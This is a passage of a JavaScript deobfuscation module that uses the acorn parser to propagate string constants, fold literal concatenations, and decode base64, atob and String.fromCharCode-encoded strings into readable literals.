  // start offsets of identifiers used as shorthand object properties: `{ a }`
  const shorthandPositions = new Set();

  walk.simple(ast, {
    VariableDeclaration(node) {
      if (node.kind !== 'const') return;
      for (const decl of node.declarations) {
        if (decl.id?.type !== 'Identifier') continue;
        if (decl.init?.type === 'Literal' && typeof decl.init.value === 'string') {
          constMap.set(decl.id.name, decl.init.value);
        }
      }
    },
    // acorn-walk reports identifiers in binding/assignment-target position under
    // the pseudo-type `VariablePattern` (declarations, parameters, catch params,
    // function/class names, assignment targets).
    VariablePattern(node) {
      bindingCounts.set(node.name, (bindingCounts.get(node.name) ?? 0) + 1);
    },
    AssignmentExpression(node) {
      if (node.left?.type === 'Identifier') {
        reassigned.add(node.left.name);
      }
    },
    UpdateExpression(node) {
      // `a++` would become `'x'++`, which no longer parses.
      if (node.argument?.type === 'Identifier') {
        reassigned.add(node.argument.name);
      }
    },
    MemberExpression(node) {
      // obj.prop — prop is not a variable reference
      if (!node.computed && node.property?.type === 'Identifier') {
        propPositions.add(node.property.start);
      }
    },
    VariableDeclarator(node) {
      // The declared name itself must never be replaced
      if (node.id?.type === 'Identifier') {
        propPositions.add(node.id.start);
      }
    },
    Property(node) {
      // `{ a }` must become `{ a: 'x' }`, not `{ 'x' }` (a syntax error)
      if (node.shorthand && node.value?.type === 'Identifier') {
        shorthandPositions.add(node.value.start);
      }
    },
    Identifier(node) {
      references.push(node);
    }
  });

  // Drop every name whose value cannot be trusted without scope analysis
  for (const [name, count] of bindingCounts) {
    if (count > 1) constMap.delete(name);
  }
  for (const name of reassigned) {
    constMap.delete(name);
  }
  if (constMap.size === 0) {
    return { code: sourceCode, transforms };
  }

  const validReplacements = [];
  for (const node of references) {
    if (!constMap.has(node.name)) continue;
    if (propPositions.has(node.start)) continue;
    const literal = quoteString(constMap.get(node.name));
    validReplacements.push({
      start: node.start,
      end: node.end,
      value: shorthandPositions.has(node.start) ? `${node.name}: ${literal}` : literal,
      type: 'const_propagation',
      before: sourceCode.slice(node.start, node.end)
    });
  }
  if (validReplacements.length === 0) {
    return { code: sourceCode, transforms };
  }

  // Apply replacements from end to start so earlier offsets stay valid
  validReplacements.sort((a, b) => b.start - a.start);
  let code = sourceCode;
  for (const r of validReplacements) {
    code = code.slice(0, r.start) + r.value + code.slice(r.end);
    transforms.push({
      type: r.type,
      start: r.start,
      end: r.end,
      before: r.before,
      after: r.value
    });
  }

  // Now re-run concat folding on the propagated code
  const phase3 = foldConcatsOnly(code);
  if (phase3.transforms.length > 0) {
    code = phase3.code;
    transforms.push(...phase3.transforms);
  }
  transforms.reverse();
  return { code, transforms };
}
/**
 * Phase 3 helper: fold `'a' + 'b'` style concatenations of string literals,
 * and nothing else, in the given source.
 *
 * Returns `{ code, transforms }`. When the source does not parse, the input
 * is returned unchanged with an empty transform list. Only the outermost
 * foldable expression of any overlapping group is rewritten.
 */
function foldConcatsOnly(sourceCode) {
  let tree;
  try {
    tree = acorn.parse(sourceCode, {
      ecmaVersion: 2024,
      sourceType: 'module',
      allowHashBang: true,
      ranges: true
    });
  } catch {
    return { code: sourceCode, transforms: [] };
  }

  // Gather every `+` expression that folds down to a single string.
  const candidates = [];
  walk.simple(tree, {
    BinaryExpression(expr) {
      if (expr.operator !== '+') return;
      const joined = tryFoldConcat(expr);
      if (joined === null) return;
      candidates.push({
        start: expr.start,
        end: expr.end,
        value: quoteString(joined),
        type: 'string_concat',
        before: sourceCode.slice(expr.start, expr.end)
      });
    }
  });

  // Order by position, widest span first, then keep only non-overlapping spans.
  candidates.sort((a, b) => a.start - b.start || b.end - a.end);
  const kept = [];
  let coveredUntil = -1;
  for (const candidate of candidates) {
    if (candidate.start >= coveredUntil) {
      kept.push(candidate);
      coveredUntil = candidate.end;
    }
  }

  // Rewrite back-to-front so the recorded offsets remain valid while splicing.
  const transforms = [];
  let code = sourceCode;
  for (let i = kept.length - 1; i >= 0; i--) {
    const { start, end, value, type, before } = kept[i];
    code = code.slice(0, start) + value + code.slice(end);
    transforms.push({ type, start, end, before, after: value });
  }
  return { code, transforms };
}
+// ============================================================
+// HELPERS
+// ============================================================
/**
 * Fold a tree of `+` BinaryExpressions whose leaves are all string literals.
 * Returns the concatenated string, or null as soon as any leaf is something
 * other than a string literal (or any inner node is not a `+` expression).
 */
function tryFoldConcat(node) {
  // Explicit stack instead of recursion; the right operand is pushed first so
  // that leaves are consumed left-to-right.
  const pending = [node];
  let result = '';
  while (pending.length > 0) {
    const current = pending.pop();
    const isStringLiteral = current.type === 'Literal' && typeof current.value === 'string';
    if (isStringLiteral) {
      result += current.value;
      continue;
    }
    const isPlus = current.type === 'BinaryExpression' && current.operator === '+';
    if (!isPlus) {
      return null;
    }
    pending.push(current.right, current.left);
  }
  return result;
}
/**
 * Check if node is a call to String.fromCharCode(...).
 *
 * Accepts both `String.fromCharCode(...)` and the bracket form with a string
 * literal key, `String['fromCharCode'](...)`. A computed access with a
 * non-literal key (`String[fromCharCode]`, where `fromCharCode` is a variable)
 * is rejected because the method being called is not statically known.
 *
 * @param {object} node - ESTree node.
 * @returns {boolean}
 */
function isStringFromCharCode(node) {
  if (node.type !== 'CallExpression') return false;
  const callee = node.callee;
  if (callee?.type !== 'MemberExpression') return false;
  if (callee.object?.type !== 'Identifier' || callee.object.name !== 'String') return false;
  const prop = callee.property;
  if (callee.computed) {
    // String['fromCharCode'] — only a literal key is statically resolvable
    return prop?.type === 'Literal' && prop.value === 'fromCharCode';
  }
  return prop?.type === 'Identifier' && prop.name === 'fromCharCode';
}
/**
 * Collect the numeric literal arguments of a call expression.
 * A spread of an array literal (`...[1, 2]`) contributes its elements; every
 * other argument must itself be a number literal.
 * Returns the numbers in call order, or null when the call has no arguments
 * or any argument/element is not a number literal.
 */
function extractNumericArgs(node) {
  const isNumberLiteral = (candidate) =>
    candidate?.type === 'Literal' && typeof candidate.value === 'number';

  const collected = [];
  for (const argument of node.arguments) {
    const spreadsArrayLiteral =
      argument.type === 'SpreadElement' && argument.argument?.type === 'ArrayExpression';
    // Treat a plain argument as a one-element list so both shapes share one loop.
    const candidates = spreadsArrayLiteral ? argument.argument.elements : [argument];
    for (const candidate of candidates) {
      if (!isNumberLiteral(candidate)) {
        return null; // variable, expression, hole, non-number literal — abort
      }
      collected.push(candidate.value);
    }
  }
  return collected.length === 0 ? null : collected;
}
/**
 * Check if node is Buffer.from('<string literal>', 'base64').toString()
 *
 * The match is restricted to calls whose result is the plain text of the
 * decoded bytes:
 *   - `.toString()` with no argument, or with a single string-literal encoding
 *     that is 'utf8', 'utf-8', 'ascii', 'latin1' or 'binary' (case-insensitive);
 *   - `.toString('hex')`, `.toString('base64')`, a non-literal encoding, or the
 *     `(encoding, start, end)` form are rejected, since decoding them as text
 *     would yield a different string than the program computes.
 * Computed member access (`Buffer[from]`, `x[toString]`) is rejected as well.
 *
 * NOTE(review): assumes the caller decodes the payload as UTF-8 text — confirm
 * against the call site of extractBufferBase64Arg.
 *
 * @param {object} node - ESTree node.
 * @returns {boolean}
 */
function isBufferBase64ToString(node) {
  if (node.type !== 'CallExpression') return false;
  const callee = node.callee;
  // .toString() call
  if (callee?.type !== 'MemberExpression' || callee.computed) return false;
  if (callee.property?.type !== 'Identifier' || callee.property.name !== 'toString') return false;
  // Only text-compatible output encodings can be folded into a string literal
  const outputArgs = node.arguments ?? [];
  if (outputArgs.length > 1) return false;
  if (outputArgs.length === 1) {
    const encoding = outputArgs[0];
    if (encoding?.type !== 'Literal' || typeof encoding.value !== 'string') return false;
    const textEncodings = ['utf8', 'utf-8', 'ascii', 'latin1', 'binary'];
    if (!textEncodings.includes(encoding.value.toLowerCase())) return false;
  }
  // The object is Buffer.from(str, 'base64')
  const inner = callee.object;
  if (inner?.type !== 'CallExpression') return false;
  const innerCallee = inner.callee;
  if (innerCallee?.type !== 'MemberExpression' || innerCallee.computed) return false;
  if (innerCallee.object?.type !== 'Identifier' || innerCallee.object.name !== 'Buffer') return false;
  if (innerCallee.property?.type !== 'Identifier' || innerCallee.property.name !== 'from') return false;
  // Args: (string, 'base64')
  if (inner.arguments.length < 2) return false;
  if (inner.arguments[1]?.type !== 'Literal' || inner.arguments[1].value !== 'base64') return false;
  if (inner.arguments[0]?.type !== 'Literal' || typeof inner.arguments[0].value !== 'string') return false;
  return true;
}
/**
 * Return the value of the first argument of the call that `.toString()` is
 * invoked on, i.e. the base64 text in Buffer.from(<text>, 'base64').toString().
 * Performs no validation of the node shape.
 */
function extractBufferBase64Arg(node) {
  const bufferFromCall = node.callee.object;
  const [encodedArg] = bufferFromCall.arguments;
  return encodedArg.value;
}
/**
 * True when node is a call of the bare identifier `atob` with exactly one
 * argument, and that argument is a string literal.
 */
function isAtobCall(node) {
  if (node.type !== 'CallExpression') return false;
  const { callee, arguments: args } = node;
  const calleeIsAtob = callee?.type === 'Identifier' && callee.name === 'atob';
  if (!calleeIsAtob || args.length !== 1) return false;
  const [payload] = args;
  return payload?.type === 'Literal' && typeof payload.value === 'string';
}
/**
 * True when `fn` is a plain (non-async, non-generator) function or arrow
 * function whose whole body is `String.fromCharCode(<first parameter>)`.
 */
function isIdentityFromCharCodeCallback(fn) {
  if (fn?.type !== 'ArrowFunctionExpression' && fn?.type !== 'FunctionExpression') return false;
  if (fn.async || fn.generator) return false;
  const param = fn.params?.[0];
  if (param?.type !== 'Identifier') return false;
  let expr = fn.body;
  if (expr?.type === 'BlockStatement') {
    // Only `{ return String.fromCharCode(c); }` is accepted
    if (expr.body.length !== 1 || expr.body[0].type !== 'ReturnStatement') return false;
    expr = expr.body[0].argument;
  }
  if (expr?.type !== 'CallExpression' || expr.arguments.length !== 1) return false;
  const callee = expr.callee;
  if (callee?.type !== 'MemberExpression' || callee.computed) return false;
  if (callee.object?.type !== 'Identifier' || callee.object.name !== 'String') return false;
  if (callee.property?.type !== 'Identifier' || callee.property.name !== 'fromCharCode') return false;
  const arg = expr.arguments[0];
  return arg?.type === 'Identifier' && arg.name === param.name;
}

/**
 * Try to resolve [0x63, ...].map(c => String.fromCharCode(c)).join('')
 *
 * The array must be a literal containing only number literals, and the map
 * callback must convert each element unchanged (see
 * isIdentityFromCharCodeCallback). Callbacks that transform the code first
 * (e.g. `c => String.fromCharCode(c ^ 0x20)`) or pass `String.fromCharCode`
 * directly are left alone: decoding the raw numbers would produce a string
 * the program never computes.
 *
 * @param {object} node - ESTree node, expected to be the `.join('')` call.
 * @param {string} source - Source text that `node.start` / `node.end` index into.
 * @returns {{start: number, end: number, value: string, type: string, before: string}|null}
 *   A replacement object, or null when the pattern does not match.
 */
function tryResolveHexArrayMap(node, source) {
  // Pattern: <expr>.join('') where <expr> is <array>.map(<fn>)
  // node is the .join('') call
  if (node.type !== 'CallExpression') return null;
  const callee = node.callee;
  if (callee?.type !== 'MemberExpression') return null;
  if (callee.property?.type !== 'Identifier' || callee.property.name !== 'join') return null;
  // Verify .join('') or .join("")
  if (node.arguments.length !== 1) return null;
  if (node.arguments[0]?.type !== 'Literal' || node.arguments[0].value !== '') return null;
  // The object of .join should be a .map(...) call
  const mapCall = callee.object;
  if (mapCall?.type !== 'CallExpression') return null;
  if (mapCall.callee?.type !== 'MemberExpression') return null;
  if (mapCall.callee.property?.type !== 'Identifier' || mapCall.callee.property.name !== 'map') return null;
  // The map callback must be exactly `x => String.fromCharCode(x)`
  if (mapCall.arguments.length < 1) return null;
  if (!isIdentityFromCharCodeCallback(mapCall.arguments[0])) return null;
  // The object of .map should be an ArrayExpression of numbers
  const arr = mapCall.callee.object;
  if (arr?.type !== 'ArrayExpression') return null;
  const nums = [];
  for (const el of arr.elements) {
    if (el?.type === 'Literal' && typeof el.value === 'number') {
      nums.push(el.value);
    } else {
      return null; // non-numeric element — abort
    }
  }
  if (nums.length === 0) return null;
  try {
    // Spreading a very large array can exceed the engine's argument limit
    const decoded = String.fromCharCode(...nums);
    const before = source.slice(node.start, node.end);
    return {
      start: node.start,
      end: node.end,
      value: quoteString(decoded),
      type: 'hex_array',
      before
    };
  } catch {
    return null;
  }
}
/**
 * Report whether the subtree rooted at `node` contains a member expression
 * of the form String.fromCharCode anywhere inside it.
 * Non-object input yields false.
 */
function containsFromCharCode(node) {
  if (!node || typeof node !== 'object') return false;

  const isTarget =
    node.type === 'MemberExpression' &&
    node.object?.type === 'Identifier' &&
    node.object.name === 'String' &&
    node.property?.type === 'Identifier' &&
    node.property.name === 'fromCharCode';
  if (isTarget) return true;

  // Positional/meta fields never hold child nodes.
  const ignoredKeys = ['type', 'start', 'end', 'range'];
  return Object.keys(node).some((key) => {
    if (ignoredKeys.includes(key)) return false;
    const child = node[key];
    if (Array.isArray(child)) {
      // Lists of nodes (params, body, arguments, ...): search every entry.
      return child.some((entry) => containsFromCharCode(entry));
    }
    // Single values are only descended into when they look like AST nodes.
    const looksLikeNode = Boolean(child && typeof child === 'object' && child.type);
    return looksLikeNode && containsFromCharCode(child);
  });
}
/**
 * Render a string value as a single-quoted JS string literal.
 * Backslash, single quote, newline, carriage return and tab are escaped;
 * every other character is emitted as-is.
 */
function quoteString(str) {
  const escapes = {
    '\\': '\\\\',
    "'": "\\'",
    '\n': '\\n',
    '\r': '\\r',
    '\t': '\\t'
  };
  // One pass over the input: each special character maps to its escape.
  const body = str.replace(/[\\'\n\r\t]/g, (ch) => escapes[ch]);
  return "'" + body + "'";
}
/**
 * Check if a decoded string is "printable".
 * Prevents replacing base64 that decodes to binary garbage.
 *
 * A character counts as non-printable when it is:
 *   - a C0 control character other than tab, line feed or carriage return,
 *   - DEL or a C1 control character (U+007F–U+009F),
 *   - U+FFFD, the replacement character a UTF-8 decoder emits for invalid
 *     byte sequences (binary data decoded as UTF-8 consists largely of these).
 *
 * @param {string} str - Decoded text to inspect.
 * @returns {boolean} false for the empty string, or when 20% or more of the
 *   UTF-16 code units are non-printable; true otherwise.
 */
function isPrintable(str) {
  if (str.length === 0) return false;
  let suspiciousCount = 0;
  for (let i = 0; i < str.length; i++) {
    const code = str.charCodeAt(i);
    const isC0Control = code < 32 && code !== 9 && code !== 10 && code !== 13;
    const isDelOrC1Control = code >= 0x7f && code <= 0x9f;
    const isReplacementChar = code === 0xfffd;
    if (isC0Control || isDelOrC1Control || isReplacementChar) {
      suspiciousCount++;
    }
  }
  return (suspiciousCount / str.length) < 0.2;
}
+module.exports = { deobfuscate };